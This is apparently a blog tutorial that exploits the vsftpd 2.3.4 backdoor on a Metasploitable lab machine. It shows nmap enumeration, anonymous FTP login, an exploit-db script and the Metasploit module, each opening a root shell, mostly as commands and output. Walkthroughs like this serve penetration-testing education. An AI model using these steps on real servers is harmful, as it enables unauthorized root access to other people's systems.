Techniques for Exploiting FTP Servers

Hacker Halt
5 min readAug 28, 2024

--

Email : hackerhalt02@gmail.com

Given : 192.168.1.10 Metasploitable Machine

NMap Ports Scanning

(hackerhalt㉿kali)-[~]
└─$ nmap 192.168.1.10 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 04:27 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00020s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Here we have the open Ports all Ports are working in the TCP Connections

Port 21 FTP

Let’s proceed with exploiting the FTP ports. We have identified two ports running the FTP service, though they are on different port numbers. The default FTP port is 21; however, there is also another port, 2121, which is running the FTP service as well but with a different version.

Anonymous FTP login allowed

┌──(hackerhalt㉿kali)-[~]
└─$ nmap 192.168.1.10 -p21 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 12:45 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00051s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.6
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.90 second

Here, we observe that the FTP port allows anonymous login. The Anonymous File Transfer Protocol (FTP) permits remote users to access the FTP server without needing a specific user ID and password. This unprotected access enables users to retrieve information from the remote system without authentication. The remote site controls the scope of information accessible through this anonymous access.

Login FTP Anonymous

(hackerhalt㉿kali)-[~]
└─$ ftp 192.168.1.10
Connected to 192.168.1.10.
220 (vsFTPd 2.3.4)
Name (192.168.1.10:hackerhalt): Anonymous
331 Please specify the password.
Password:
230 Login successful.

FTP Enumeration Using Nmap Scripting

                                                                                                                                     
┌──(hackerhalt㉿kali)-[/usr/share/nmap/scripts]
└─$ ls -l | grep ftp
-rw-r--r-- 1 root root 4530 Jun 20 14:27 ftp-anon.nse
-rw-r--r-- 1 root root 3253 Jun 20 14:27 ftp-bounce.nse
-rw-r--r-- 1 root root 3108 Jun 20 14:27 ftp-brute.nse
-rw-r--r-- 1 root root 3272 Jun 20 14:27 ftp-libopie.nse
-rw-r--r-- 1 root root 3290 Jun 20 14:27 ftp-proftpd-backdoor.nse
-rw-r--r-- 1 root root 3768 Jun 20 14:27 ftp-syst.nse
-rw-r--r-- 1 root root 6021 Jun 20 14:27 ftp-vsftpd-backdoor.nse
-rw-r--r-- 1 root root 5923 Jun 20 14:27 ftp-vuln-cve2010-4221.nse
-rw-r--r-- 1 root root 5736 Jun 20 14:27 tftp-enum.nse
-rw-r--r-- 1 root root 10034 Jun 20 14:27 tftp-version.nse

┌──(hackerhalt㉿kali)-[/usr/share/nmap/scripts]
└─$ nmap --script=ftp-vsftpd-backdoor.nse 192.168.1.10 -p21
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 13:03 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00060s latency).

PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| https://www.securityfocus.com/bid/48539
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds

─(hackerhalt㉿kali)-[/usr/share/nmap/scripts]
└─$ nmap --script=ftp-anon.nse 192.168.1.10 -p21
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 13:04 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00040s latency).

PORT STATE SERVICE
21/tcp open ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds

Using Nmap Scripting, we have identified that the FTP version in use is vulnerable. There are several methods to exploit this vulnerability, including utilizing GHDB, Searchsploit, GitHub, and the Metasploit Framework.

Exploiting FTP Using Searchsploit

(hackerhalt㉿kali)-[~]
└─$ searchsploit vsftpd 2.3.4
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Here, we can proceed with exploiting the outdated version of the FTP service.

Download Exploit From Searchsploit

(hackerhalt㉿kali)-[~]
└─$ searchsploit -m 49757
Exploit: vsftpd 2.3.4 - Backdoor Command Execution
URL: https://www.exploit-db.com/exploits/49757
Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
Codes: CVE-2011-2523
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/hackerhalt/49757.py

Exploit

                                                                                                                                     
┌──(hackerhalt㉿kali)-[~]
└─$ python3 49757.py 192.168.1.10
/home/hackerhalt/49757.py:11: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
from telnetlib import Telnet
Success, shell opened
Send `exit` to quit shell
whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

Metasploit Framework Exploit FTP

(hackerhalt㉿kali)-[~]
└─$ msfconsole
Metasploit tip: Enable HTTP request and response logging with set HttpTrace
true

IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'

I love shells --egypt


=[ metasploit v6.4.18-dev ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search exploit vsftpd 2.3.4

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
it.html
RPORT 21 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.1.10
rhost => 192.168.1.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.168.1.10:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.10:21 - USER: 331 Please specify the password.
[+] 192.168.1.10:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.10:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.6:45803 -> 192.168.1.10:6200) at 2024-08-27 12:58:51 -0400

whoami
root

--

--